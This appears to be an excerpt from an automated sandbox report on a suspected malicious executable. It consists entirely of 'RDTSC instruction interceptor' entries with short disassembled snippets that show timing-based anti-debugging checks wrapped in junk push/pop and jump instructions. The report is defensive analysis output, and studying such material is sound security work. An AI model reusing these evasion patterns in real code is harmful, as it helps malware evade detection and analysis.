                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD27 second address: 59BD44 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007F8480C71BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F8480C71BFBh 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BED0 second address: 59BED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BED4 second address: 59BEE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71BFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BEE7 second address: 59BF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480E3138Fh 0x00000009 jmp 00007F8480E31397h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FEA0 second address: 59FEB9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8480C71BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jne 00007F8480C71C1Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F8480C71BF6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FEB9 second address: 59FEBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59FEBD second address: 59FEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A0152 second address: 5A0162 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007F8480E31386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A66A5 second address: 5A66AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A6096 second address: 5A60A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8480E31386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A60A0 second address: 5A60BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jne 00007F8480C71BF6h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AADC3 second address: 5AADC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB06F second address: 5AB076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB076 second address: 5AB07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB1A4 second address: 5AB1A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB1A8 second address: 5AB1E5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8480E31386h 0x00000008 jmp 00007F8480E31395h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8480E31396h 0x00000014 pop edx 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB1E5 second address: 5AB1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB47C second address: 5AB484 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB484 second address: 5AB496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480C71BFCh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB496 second address: 5AB49A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F847 second address: 55F8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jno 00007F8480C71C02h 0x0000000c nop 0x0000000d jmp 00007F8480C71BFFh 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F8480C71BF8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e jnp 00007F8480C71C0Eh 0x00000034 nop 0x00000035 jbe 00007F8480C71BFCh 0x0000003b pushad 0x0000003c push esi 0x0000003d pop esi 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jnp 00007F8480C71BFCh 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B073B second address: 5B074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480E3138Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B08BE second address: 5B08C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8480C71BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0E40 second address: 5B0E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0E44 second address: 5B0E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8480C71C07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F8480C71BF8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0E6D second address: 5B0E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B74A5 second address: 5B74AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B74AB second address: 5B74AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B74AF second address: 5B74BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8480C71BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7A89 second address: 5B7A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7A8D second address: 5B7AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8480C71BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F8480C71BFEh 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F8480C71C13h 0x0000001b jmp 00007F8480C71C07h 0x00000020 js 00007F8480C71BF6h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7AD0 second address: 5B7AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B887E second address: 5B8884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B8884 second address: 5B88AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F8480E3138Ah 0x0000000c jmp 00007F8480E3138Ch 0x00000011 popad 0x00000012 pushad 0x00000013 jc 00007F8480E31392h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BDB96 second address: 5BDB9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD046 second address: 5BD04C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD04C second address: 5BD050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD483 second address: 5BD49D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F8480E31391h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD739 second address: 5BD749 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8480C71C02h 0x00000008 ja 00007F8480C71BF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2788 second address: 5C278E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C278E second address: 5C2794 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2794 second address: 5C279D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C4B0E second address: 5C4B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CBB94 second address: 5CBB98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CBB98 second address: 5CBBC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8480C71BFBh 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CBBC4 second address: 5CBBCC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CBBCC second address: 5CBBD6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8480C71BFEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CBEC0 second address: 5CBEDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F8480E3138Eh 0x0000000f jc 00007F8480E31386h 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC065 second address: 5CC082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F8480C71C04h 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC082 second address: 5CC08C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8480E3138Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC08C second address: 5CC095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC346 second address: 5CC34B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC771 second address: 5CC777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB580 second address: 5CB586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508406 second address: 50840C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50840C second address: 508410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508410 second address: 50841E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E11FC second address: 5E1202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1202 second address: 5E1206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1206 second address: 5E121A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8480E31386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007F8480E3138Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E121A second address: 5E1227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0DAC second address: 5E0DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0DB1 second address: 5E0DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F8480C71BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0DBB second address: 5E0DCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480E3138Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6CA2 second address: 5E6CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F8480C71BF6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6CAF second address: 5E6CB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EBC0F second address: 5EBC15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600CB3 second address: 600CBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFD92 second address: 5FFD96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFD96 second address: 5FFDAA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8480E31386h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F8480E31386h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFDAA second address: 5FFDC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71C01h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F8480C71BFCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFF1C second address: 5FFF3A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8480E3138Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jl 00007F8480E31388h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6000AC second address: 6000D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F8480C71BF8h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8480C71C08h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6000D5 second address: 600101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480E3138Dh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007F8480E31386h 0x00000012 jmp 00007F8480E31390h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600101 second address: 60010B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600A19 second address: 600A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600A1F second address: 600A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60497C second address: 604992 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jno 00007F8480E31386h 0x0000000f jno 00007F8480E31386h 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604655 second address: 604659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 604659 second address: 604699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F8480E313AEh 0x0000000e jmp 00007F8480E31395h 0x00000013 jmp 00007F8480E31393h 0x00000018 pushad 0x00000019 jne 00007F8480E31386h 0x0000001f push esi 0x00000020 pop esi 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AA22 second address: 60AA31 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8480C71BF6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D398 second address: 60D3D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F8480E31397h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jmp 00007F8480E31397h 0x00000013 js 00007F8480E31386h 0x00000019 pop esi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DD99 second address: 61DD9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DD9D second address: 61DDC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F8480E313A2h 0x0000000c jmp 00007F8480E31396h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DDC1 second address: 61DDE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnp 00007F8480C71BF6h 0x0000000c jmp 00007F8480C71C04h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61DDE1 second address: 61DDE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620B94 second address: 620B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8480C71BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620B9E second address: 620BCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480E31395h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8480E31391h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620BCC second address: 620BDA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8480C71BF8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620BDA second address: 620BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620858 second address: 620867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F8480C71BF6h 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620867 second address: 62087E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8480E31390h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FB39 second address: 62FB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FB3F second address: 62FB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FF3B second address: 62FF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8480C71BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FF45 second address: 62FF4F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FF4F second address: 62FF5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480C71BFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630223 second address: 630244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F8480E31397h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6303D2 second address: 6303EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8480C71BF6h 0x00000009 jmp 00007F8480C71C01h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
